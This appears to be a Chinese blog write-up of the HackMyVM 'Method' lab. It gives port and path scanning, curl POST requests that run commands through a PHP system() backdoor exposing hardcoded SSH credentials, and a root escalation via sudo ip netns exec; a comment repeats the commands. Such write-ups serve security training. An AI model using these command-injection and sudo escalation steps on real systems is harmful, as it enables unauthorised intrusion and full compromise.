hmv.method

信息搜集

主机扫描

arp-scan -l

端口扫描

 ┌──(root㉿kali)-[~]
└─# nmap -sV -p-   192.168.239.198
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-15 11:00 EDT
Nmap scan report for 192.168.239.198
Host is up (0.00032s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
MAC Address: 08:00:27:57:7A:C6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

路径扫描

 [11:01:32] Starting:                                                                                                                                      
[11:02:01] 200 -  344B  - /index.htm                                        
[11:02:18] 200 -  285B  - /sitemap.xml

提示带有参数，呢就访问看是什么

在源码处发现一个路径，直接访问

/secret.php,以及一个get参数hackmyvm，但是当我get传参发现错误提示：

 ┌──(root㉿kali)-[~]
└─# curl http://192.168.239.198/secret.php?HackMyVM
Now the main part what it is loooooool<br>Try other method

那么我就利用post传参试试

-d 是需要传入的数据

读取secret.php，发现用户以及密码

 ┌──(root㉿kali)-[~]
└─# curl -X POST 'http://192.168.239.198/secret.php' -d 'HackMyVM=cat secret.php'
You Found ME : - (<pre><?php
if(isset($_GET['HackMyVM'])){
        echo "Now the main part what it is loooooool";
        echo "<br>";
echo "Try other method";
        die;
}
if(isset($_POST['HackMyVM'])){
        echo "You Found ME : - (";
        echo "<pre>";
        $cmd = ($_POST['HackMyVM']);
        system($cmd);
        echo "</pre>";
        die;
}
else {
header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg");
}
$ok="prakasaka:th3-!llum!n@t0r";
?>
</pre>

获取shell

ssh登录

 prakasaka@method:~$ cat uSeR.txt 
e4408105ca9c2a5c*************

提权

直接sudo -l,发现ip可提权

 prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
User prakasaka may run the following commands on method:
    (!root) NOPASSWD: /bin/bash
    (root) /bin/ip

直接搜索垃圾箱知识产权 | go away垃圾箱 (gtfobins.github.io)

 prakasaka@method:~$ sudo ip netns add foo
prakasaka@method:~$ sudo ip netns exec foo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cat rOot.txt
fc9c6eb6265921315***********

知识点

网站源码的信息搜集
get与post的提交方式
curl的使用，因为会有重定向的跳转

nice to meet you

信息搜集

主机扫描

端口扫描

路径扫描

获取shell

提权

知识点

hmv.find

hmv.stars

Comments | NOTHING

取消回复

ayanamiii

	┌──(root㉿kali)-[~]
	└─# nmap -sV -p- 192.168.239.198
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-15 11:00 EDT
	Nmap scan report for 192.168.239.198
	Host is up (0.00032s latency).
	Not shown: 65533 closed tcp ports (reset)
	PORT STATE SERVICE VERSION
	22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
	80/tcp open http nginx 1.18.0
	MAC Address: 08:00:27:57:7A:C6 (Oracle VirtualBox virtual NIC)
	Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

	[11:01:32] Starting:
	[11:02:01] 200 - 344B - /index.htm
	[11:02:18] 200 - 285B - /sitemap.xml

	┌──(root㉿kali)-[~]
	└─# curl http://192.168.239.198/secret.php?HackMyVM
	Now the main part what it is loooooool<br>Try other method

	┌──(root㉿kali)-[~]
	└─# curl -X POST 'http://192.168.239.198/secret.php' -d 'HackMyVM=cat secret.php'
	You Found ME : - (<pre><?php
	if(isset($_GET['HackMyVM'])){
	echo "Now the main part what it is loooooool";
	echo "<br>";
	echo "Try other method";
	die;
	}
	if(isset($_POST['HackMyVM'])){
	echo "You Found ME : - (";
	echo "<pre>";
	$cmd = ($_POST['HackMyVM']);
	system($cmd);
	echo "</pre>";
	die;
	}
	else {
	header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg");
	}
	$ok="prakasaka:th3-!llum!n@t0r";
	?>
	</pre>

	prakasaka@method:~$ cat uSeR.txt
	e4408105ca9c2a5c*************

	prakasaka@method:~$ sudo -l
	Matching Defaults entries for prakasaka on method:
	env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

	User prakasaka may run the following commands on method:
	(!root) NOPASSWD: /bin/bash
	(root) /bin/ip

	prakasaka@method:~$ sudo ip netns add foo
	prakasaka@method:~$ sudo ip netns exec foo /bin/sh
	# id
	uid=0(root) gid=0(root) groups=0(root)
	# cat rOot.txt
	fc9c6eb6265921315***********